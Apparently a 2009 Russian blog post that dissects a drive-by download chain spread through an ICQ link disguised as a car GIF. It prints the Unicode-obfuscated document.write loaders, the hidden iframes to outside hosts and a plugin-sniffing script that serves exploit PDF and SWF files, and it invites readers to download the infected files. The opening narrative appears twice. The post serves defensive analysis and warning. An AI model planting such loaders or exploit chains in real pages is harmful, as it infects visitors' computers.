p.s.2: В этом топике вируса нет, хотя „Авасту“ может казаться иначе (спасибо edio)
Всё началось с невинного сообщения в icq от моей хорошей знакомой:
Вроде ничего подозрительного. Ну ладно, думаю, зайду. Там рендер BMW какой-то. В общем, довольно приятный. Картинка уже загрузилась, а индикатор загрузки страницы всё не заканчивался… это сработало для меня как тревожный звоночек. Я тут же ткнул Esc, после чего Огнелис остановил загрузку в закладке. С мыслью, что тут надо разобраться, я (с чего-то) решил посмотреть исходный код картинки. По идее, там должна была быть какая-то ерунда, как в любом gif-jpeg изображении, НО! Реальность оказалась горазно интереснее. Итак, смотрим в браузере исходник картинки:
Ого! Да это же совсем и не картинка ни разу.
Так-так, интересно, что в яваскрипте?
Смотрим!
Редирект. Хорошо, не привыкать, идём по цепочке дальше:
Это и есть конец зловредной цепочки:
То есть, добро пожаловать на компьютер pdf (evenLike.pdf — инфицирован Exploit.Win32.Pidief.bfz) и swf, наши самые любимые друзья. Я уже не стал разбирать дальше: эти скрипт и документы эксплуатируют свежую июльскую уязвимость (топик на Хабре), февральскую, а может быть и более старую. Если помните, одно время по сети ходила ссылка на «вирусный ролик» на сайте Альфастраха, который, как оказалось, был вирусным без кавычек, потому что сажал на компьютер пользователя Trojan-Spy.Win32.Zbot.gkj.
Хотите поиграться? Вы легко можете скачать себе эти документы, и посмотреть, что каждый из них творит. Если этого недостаточно, то есть другой «пример», но автор предупреждает, что ‘This virus is srs business!‘ («этот вирус – нешуточное дело»).
Так что совместно с сайтом TechBytesDaily я призываю вас отключить показ pdf в окне браузера, как бы удобно это ни казалось. Всегда сохранять pdf документы, и по возможности, пользоваться бесплатыми не столь дырявыми аналогами Адоби Акробата (как Foxit Reader, Sumatra PDF). К сожалению, плагин от Адоби не фильтрует достаточным образом получаемый контент перед тем, как отдать показать его пользователю в браузере.
И ещё раз о безопасности: будьте внимательны к непонятным сообщениям даже от хорошо знакомых людей, особенно если в нём есть ссылка на неизвестный ресурс и нет личного комментария от автора.
p.s. В ссылках http на hxxp исправлено мной специально.
Всё началось с невинного сообщения в icq от моей хорошей знакомой:
31.07.2009 18:45:11 xyz: смотри hxxp://watnhome.com/images/car.gif :)
Вроде ничего подозрительного. Ну ладно, думаю, зайду. Там рендер BMW какой-то. В общем, довольно приятный. Картинка уже загрузилась, а индикатор загрузки страницы всё не заканчивался… это сработало для меня как тревожный звоночек. Я тут же ткнул Esc, после чего Огнелис остановил загрузку в закладке. С мыслью, что тут надо разобраться, я (с чего-то) решил посмотреть исходный код картинки. По идее, там должна была быть какая-то ерунда, как в любом gif-jpeg изображении, НО! Реальность оказалась горазно интереснее. Итак, смотрим в браузере исходник картинки:
view-source:hxxp://watnhome.com/images/car.gif
Ого! Да это же совсем и не картинка ни разу.
<img src="WorleyVision5.jpg">
<script type="text/javascript" src="js.js"></script>
Так-так, интересно, что в яваскрипте?
Смотрим!
view-source:hxxp://watnhome.com/images/js.js
Там оказывается лёгкая ерунда:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u0073\u0074\u0065\u006e\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
Или, переводя в более читабельный вид…document.write('<iframe src="hxxp://listenz.org/stats/ru1.php" style="display:none"></iframe>')
Редирект. Хорошо, не привыкать, идём по цепочке дальше:
view-source:hxxp://listenz.org/stats/ru1.php
Ага, привет от того же автора:<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0076\u0065\u0072\u0069\u0076\u0065\u006c\u006c\u002e\u0063\u006f\u006d\u002f\u0075\u0070\u0064\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
или, чуть более читабельно…<script type="text/javascript">document.write('<iframe src="hxxp://verivell.com/upd/index.php" style="display:none"></iframe>')</script>
Это и есть конец зловредной цепочки:
view-source:hxxp://verivell.com/upd/index.php
<script>
function PDF_SWF_Iframe(sCn)
{
document.write(sCn);
}
if(navigator.userAgent.indexOf('MSIE') != -1)
{
PDF = new Array('AcroPDF.PDF', 'PDF.PdfCtrl');
for(i in PDF)
{
try
{
obj = new ActiveXObject(PDF[i]);
if (obj)
{
PDF_SWF_Iframe('<iframe src=evenLike.pdf></iframe>');
}
}
catch(e){}
}
try
{
obj = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
if (obj)
{
PDF_SWF_Iframe('<iframe src=normalDummyBelief.swf></iframe>');
}
}
catch(e){}
}
else
{
for(i = 0; i <= navigator.plugins.length; i++)
{
var plugin = navigator.plugins[i].name;
if((plugin.indexOf('Adobe Acrobat') != -1) || (plugin.indexOf('Adobe PDF') != -1))
{
PDF_SWF_Iframe('<iframe src=evenLike.pdf></iframe>');
}
if(plugin.indexOf('Flash') != -1)
{
PDF_SWF_Iframe('<iframe src=normalDummyBelief.swf></iframe>');
}
}
}
</script>
* This source code was highlighted with Source Code Highlighter.
То есть, добро пожаловать на компьютер pdf (evenLike.pdf — инфицирован Exploit.Win32.Pidief.bfz) и swf, наши самые любимые друзья. Я уже не стал разбирать дальше: эти скрипт и документы эксплуатируют свежую июльскую уязвимость (топик на Хабре), февральскую, а может быть и более старую. Если помните, одно время по сети ходила ссылка на «вирусный ролик» на сайте Альфастраха, который, как оказалось, был вирусным без кавычек, потому что сажал на компьютер пользователя Trojan-Spy.Win32.Zbot.gkj.
Хотите поиграться? Вы легко можете скачать себе эти документы, и посмотреть, что каждый из них творит. Если этого недостаточно, то есть другой «пример», но автор предупреждает, что ‘This virus is srs business!‘ («этот вирус – нешуточное дело»).
Так что совместно с сайтом TechBytesDaily я призываю вас отключить показ pdf в окне браузера, как бы удобно это ни казалось. Всегда сохранять pdf документы, и по возможности, пользоваться бесплатыми не столь дырявыми аналогами Адоби Акробата (как Foxit Reader, Sumatra PDF). К сожалению, плагин от Адоби не фильтрует достаточным образом получаемый контент перед тем, как отдать показать его пользователю в браузере.
И ещё раз о безопасности: будьте внимательны к непонятным сообщениям даже от хорошо знакомых людей, особенно если в нём есть ссылка на неизвестный ресурс и нет личного комментария от автора.
p.s. В ссылках http на hxxp исправлено мной специально.